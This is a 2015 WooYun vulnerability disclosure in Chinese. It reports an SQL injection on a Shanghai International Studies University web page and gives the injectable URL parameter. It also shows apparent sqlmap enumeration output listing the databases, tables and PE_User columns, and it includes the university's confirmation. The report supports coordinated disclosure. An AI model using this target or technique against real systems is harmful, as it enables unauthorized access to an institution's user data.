当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131954

漏洞标题:高校安全之上海外国语大学SQL注射一脸

相关厂商:上海外国语大学

漏洞作者: 冷白开。

提交时间:2015-08-06 10:35

修复时间:2015-09-21 05:52

公开时间:2015-09-21 05:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

高校安全之上海外国语大学SQL注射一脸

详细说明:

射脸点:http://otc.shisu.edu.cn/main/Showclass.asp?classID=46


1.png

脱点数据证明危害

available databases [9]:
[*] count
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] web
[*] web2
Database: count
[108 tables]
+-----------------------+
| MY_AdminOperation |
| MY_ApplyData |
| MY_Class |
| MY_Dormitory |
| MY_EducationLevel |
| MY_Message |
| MY_UserInfo |
| PE_AdZone |
| PE_Admin |
| PE_Advertisement |
| PE_Announce |
| PE_AreaCollection |
| PE_Article |
| PE_Author |
| PE_Bank |
| PE_BankrollItem |
| PE_Card |
| PE_Channel |
| PE_City |
| PE_Class |
| PE_Classroom |
| PE_Client |
| PE_Comment |
| PE_Company |
| PE_ComplainItem |
| PE_Config |
| PE_ConsumeLog |
| PE_Contacter |
| PE_CopyFrom |
| PE_Country |
| PE_DeliverCharge |
| PE_DeliverItem |
| PE_DeliverType |
| PE_Dictionary |
| PE_DownError |
| PE_DownServer |
| PE_Equipment |
| PE_Favorite |
| PE_Field |
| PE_Filters |
| PE_Friend |
| PE_FriendSite |
| PE_FsKind |
| PE_GuestBook |
| PE_GuestKind |
| PE_HistrolyNews |
| PE_HouseArea |
| PE_HouseCS |
| PE_HouseCZ |
| PE_HouseConfig |
| PE_HouseHZ |
| PE_HouseQG |
| PE_HouseQZ |
| PE_InfoS |
| PE_InvoiceItem |
| PE_Item |
| PE_JobCategory |
| PE_JsFile |
| PE_KeyLink |
| PE_Label |
| PE_Log |
| PE_Message |
| PE_NewKeys |
| PE_OrderForm |
| PE_OrderFormItem |
| PE_Page |
| PE_PageClass |
| PE_Payment |
| PE_PaymentType |
| PE_Photo |
| PE_Position |
| PE_PositionSupplyInfo |
| PE_PresentProject |
| PE_Producer |
| PE_Product |
| PE_Province |
| PE_RechargeLog |
| PE_Resume |
| PE_ServiceItem |
| PE_ShoppingCarts |
| PE_Skin |
| PE_Soft |
| PE_Space |
| PE_SpaceBook |
| PE_SpaceComment |
| PE_SpaceDiary |
| PE_SpaceKind |
| PE_SpaceLink |
| PE_SpaceMusic |
| PE_SpacePhoto |
| PE_SpaceVisitor |
| PE_Special |
| PE_SubCompany |
| PE_Supply |
| PE_Supply_Company |
| PE_Template |
| PE_TemplateProject |
| PE_Trademark |
| PE_TransferItem |
| PE_UsedDetail |
| PE_User |
| PE_UserGroup |
| PE_Vote |
| PE_WorkPlace |
| applydata_del |
| dtproperties |
| sysconstraints |
| syssegments |
+-----------------------+
Database: count
Table: PE_User
[17 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| articleid | non-numeric |
| blog | non-numeric |
| blogid | non-numeric |
| channelid | non-numeric |
| classid | non-numeric |
| companyid | non-numeric |
| email | non-numeric |
| groupid | non-numeric |
| privacy | non-numeric |
| question | non-numeric |
| status | non-numeric |
| templateid | non-numeric |
| title | non-numeric |
| user | non-numeric |
| userid | non-numeric |
| username | non-numeric |
| voteid | non-numeric |
+------------+-------------+

漏洞证明:

综上

修复方案:

你们专业

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-07 05:50

厂商回复:

感谢冷白开提交的漏洞,我们将尽快处理,谢谢!

最新状态:

暂无